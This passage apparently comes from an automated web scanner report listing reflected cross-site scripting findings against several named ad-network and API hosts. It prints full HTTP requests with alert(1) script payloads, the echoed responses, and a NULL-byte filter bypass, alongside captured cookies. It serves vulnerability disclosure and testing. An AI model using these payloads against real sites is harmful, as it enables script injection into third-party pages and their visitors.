Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3667F90C3D92533777E23512D2CC53A4; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 12:29:28 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,j,"",Math.round(Y.left)+","+Math.round(Y.top),O+","+I,C,l,m,v,S,c)}}t=p.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_289668ad34f<script>alert(1)</script>7e0dd690cc".replace(/[^\w\d]/g,""),"ZC45X9Axu6NOUFfX_289668ad34f<script>
...[SNIP]...

6.34. http://adsfac.us/ag.asp [cc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload 42348<script>alert(1)</script>d34aa869659 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=42348<script>alert(1)</script>d34aa869659&source=js&ord=[timestamp] HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=149142;c=2206;c=1746;c=2210;pos=336showcase;tile=2;sz=336x280;ord=02880823?;c=win7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Sun, 24 Apr 2011 19:48:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FS42348%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed34aa8696590=uid=8887577; expires=Mon, 25-Apr-2011 19:49:24 GMT; path=/
Set-Cookie: FS42348%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed34aa869659=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4131&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Tue, 24-May-2011 19:49:24 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Sun, 24 Apr 2011 19:49:23 GMT
Connection: close

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://ADSFAC.US/link.asp?cc=42348<script>alert(1)</script>d34aa869659.0.0&CreativeID=1';}document.write('<a href="'+fd_clk+'&CreativeID=1" target="_blank">
...[SNIP]...

6.35. http://altfarm.mediaplex.com/ad/fm/3992-125865-29115-1 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/fm/3992-125865-29115-1

Issue detail

The value of the mpt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004b54a"><script>alert(1)</script>431fd2e15ff was submitted in the mpt parameter. This input was echoed as 4b54a"><script>alert(1)</script>431fd2e15ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /ad/fm/3992-125865-29115-1?mpt=%004b54a"><script>alert(1)</script>431fd2e15ff&mpvc= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RNYnkg2EM_1392081529.html?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUYyMjBBRTU4MTBDMjI2MjFBRkJ8R0ZCT2liWFhBY3wxMzAzNjU4NDE5MTY5fDF8MEZ3bmdyZnBiQXwwUk5ZbmtnMkVNfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7yIK5YEMImIa-_oXlc_g9IF-8zhv8w&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJOWW5rZzJFTQ&reqid=NERCNDNGQjEwMDAxRUYyMjBBRTU4MTBDMjI2MjFBRkI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 434
Date: Sun, 24 Apr 2011 15:21:10 GMT

<html><body bgcolor=#ffffff leftmargin="0" topmargin="0"><a target="_blank" href="http://altfarm.mediaplex.com/ad/ck/3992-125865-29115-1?mpt=%004b54a"><script>alert(1)</script>431fd2e15ff&mpvc="><img
...[SNIP]...

6.36. http://api.tweetmeme.com/url_info.jsonc [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /url_info.jsonc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ccb68<script>alert(1)</script>2d0efb9e6ac was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url_info.jsonc?url=http%3A%2F%2Fwww.infusionblog.com%2F&callback=aptureJsonCallback1ccb68<script>alert(1)</script>2d0efb9e6ac HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_unique_ident=4db0cb914d8999.97267012-57c11f7a933564d3f62b1bb71b01e19d

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 01:40:33 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-RateLimit-Limit: 400
X-RateLimit-Remaining: 361
X-Url-Lookup: OrAdd (31)
X-Served-By: h04
Content-Length: 448

aptureJsonCallback1ccb68<script>alert(1)</script>2d0efb9e6ac({"status":"success","story":{"title":"Infusionsoft Blog","url":"http:\/\/www.infusionblog.com\/","media_type":"news","created_at":"2009-03-05 22:58:12","url_count":"27","tm_link":"http:\/\/tweetmeme.c
...[SNIP]...

6.37. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload e96ed<script>alert(1)</script>bfcafa00f07 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractione96ed<script>alert(1)</script>bfcafa00f07&n=ar_int_p97174789&1303647004372 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p97174789=exp=1&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:09:48 2011&prad=253735207&arc=186884836&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303646989%2E757%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:10:02 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractione96ed<script>alert(1)</script>bfcafa00f07("");

6.38. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97176"><script>alert(1)</script>481e33765a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader97176"><script>alert(1)</script>481e33765a1/PizzaHut_2H/201008/18-49/All/11303658438@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P8sfj1WxPNhXSsYda6b2ziXGP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sADQkBAgUCAAQAAAAAXiR2XAAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBv9VRxj-0TY6iNMX2lQfD1_DqAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtze_WOhtVbXb9r4MiVgqp5PRvdmxw%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658438%29%3Buf%28%27c%27%2C+43438%2C+1303658438%29%3Buf%28%27r%27%2C+158848%2C+1303658438%29%3Bppv%288484%2C+%276329876008611553227%27%2C+1303658438%2C+1304263238%2C+43438%2C+25553%29%3Bppv%288484%2C+%276329876008611553227%27%2C+1303658438%2C+1304263238%2C+43438%2C+25553%29%3B&cnd=!hBzzbAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCriLQJGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; Dominos=247B3; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:28:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader97176"><script>alert(1)</script>481e33765a1/PizzaHut_2H/201008/18-49/All/766539402/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

6.39. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22680"><script>alert(1)</script>a2fbc62cbf8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/PizzaHut_2H22680"><script>alert(1)</script>a2fbc62cbf8/201008/18-49/All/11303658438@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P8sfj1WxPNhXSsYda6b2ziXGP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sADQkBAgUCAAQAAAAAXiR2XAAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBv9VRxj-0TY6iNMX2lQfD1_DqAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtze_WOhtVbXb9r4MiVgqp5PRvdmxw%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658438%29%3Buf%28%27c%27%2C+43438%2C+1303658438%29%3Buf%28%27r%27%2C+158848%2C+1303658438%29%3Bppv%288484%2C+%276329876008611553227%27%2C+1303658438%2C+1304263238%2C+43438%2C+25553%29%3Bppv%288484%2C+%276329876008611553227%27%2C+1303658438%2C+1304263238%2C+43438%2C+25553%29%3B&cnd=!hBzzbAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCriLQJGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; Dominos=247B3; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:28:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 358
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/PizzaHut_2H22680"><script>alert(1)</script>a2fbc62cbf8/201008/18-49/All/1738728620/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

6.40. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a87d7"><script>alert(1)</script>ecb48976343 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/PizzaHut_2H/201008a87d7"><script>alert(1)</script>ecb48976343/18-49/All/11303658438@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P8sfj1WxPNhXSsYda6b2ziXGP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sADQkBAgUCAAQAAAAAXiR2XAAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBv9VRxj-0TY6iNMX2lQfD1_DqAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtze_WOhtVbXb9r4MiVgqp5PRvdmxw%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658438%29%3Buf%28%27c%27%2C+43438%2C+1303658438%29%3Buf%28%27r%27%2C+158848%2C+1303658438%29%3Bppv%288484%2C+%276329876008611553227%27%2C+1303658438%2C+1304263238%2C+43438%2C+25553%29%3Bppv%288484%2C+%276329876008611553227%27%2C+1303658438%2C+1304263238%2C+43438%2C+25553%29%3B&cnd=!hBzzbAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCriLQJGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; Dominos=247B3; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:28:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 356
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/PizzaHut_2H/201008a87d7"><script>alert(1)</script>ecb48976343/18-49/All/86379371/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

6.41. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 200b7"><script>alert(1)</script>7e1d59694ad was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/PizzaHut_2H/201008/18-49200b7"><script>alert(1)</script>7e1d59694ad/All/11303658438@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P8sfj1WxPNhXSsYda6b2ziXGP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sADQkBAgUCAAQAAAAAXiR2XAAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBv9VRxj-0TY6iNMX2lQfD1_DqAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtze_WOhtVbXb9r4MiVgqp5PRvdmxw%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658438%29%3Buf%28%27c%27%2C+43438%2C+1303658438%29%3Buf%28%27r%27%2C+158848%2C+1303658438%29%3Bppv%288484%2C+%276329876008611553227%27%2C+1303658438%2C+1304263238%2C+43438%2C+25553%29%3Bppv%288484%2C+%276329876008611553227%27%2C+1303658438%2C+1304263238%2C+43438%2C+25553%29%3B&cnd=!hBzzbAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCriLQJGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; Dominos=247B3; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:29:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/PizzaHut_2H/201008/18-49200b7"><script>alert(1)</script>7e1d59694ad/All/538630173/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

6.42. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb219"><script>alert(1)</script>78ec181fa99 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/PizzaHut_2H/201008/18-49/Allbb219"><script>alert(1)</script>78ec181fa99/11303658438@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P8sfj1WxPNhXSsYda6b2ziXGP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sADQkBAgUCAAQAAAAAXiR2XAAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBv9VRxj-0TY6iNMX2lQfD1_DqAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtze_WOhtVbXb9r4MiVgqp5PRvdmxw%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658438%29%3Buf%28%27c%27%2C+43438%2C+1303658438%29%3Buf%28%27r%27%2C+1588